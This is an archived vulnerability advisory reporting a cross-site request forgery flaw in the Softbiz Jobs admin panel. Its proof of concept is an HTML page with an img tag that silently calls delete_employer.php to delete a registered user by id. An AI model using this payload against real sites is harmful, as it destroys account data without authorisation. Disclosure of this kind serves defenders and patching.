Softbiz Jobs Cross Site Request Forgery

2010-02-24T00:00:00
ID PACKETSTORM:86597
Type packetstorm
Reporter Pratul Agrawal
Modified 2010-02-24T00:00:00

Description

                                        
                                            `  
  
  
  
=======================================================================  
  
Softbiz Jobs CSRF Vulnerability  
=======================================================================  
  
by  
  
Pratul Agrawal  
  
  
# Vulnerability found in- Admin module  
  
# email Pratulag@yahoo.com  
  
# company aksitservices  
  
# Credit by Pratul Agrawal  
  
# Download http://www.softbizscripts.com/  
  
# Script softbizscripts  
  
# URL http://demos1.softbiz.com/scripts/seojobs/admin/  
  
  
  
# Proof of concept  
  
Script to delete the registered user through Cross Site request forgery  
  
...................................................................................................................  
  
<html>  
  
<body>  
  
<img src=http://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=[USER ID] />   
  
</body>  
  
</html>  
  
  
...................................................................................................................  
  
  
Example-  
...................................................................................................................  
  
<html>  
  
<body>  
  
<img src=http://demos1.softbiz.com/scripts/seojobs/admin/delete_employer.php?id=20 />   
  
</body>  
  
</html>  
  
  
...................................................................................................................  
  
After execution refresh teh page and u can see that user having id=20 get deleted automatically.  
  
  
#If you have any questions, comments, or concerns, feel free to contact me.   
`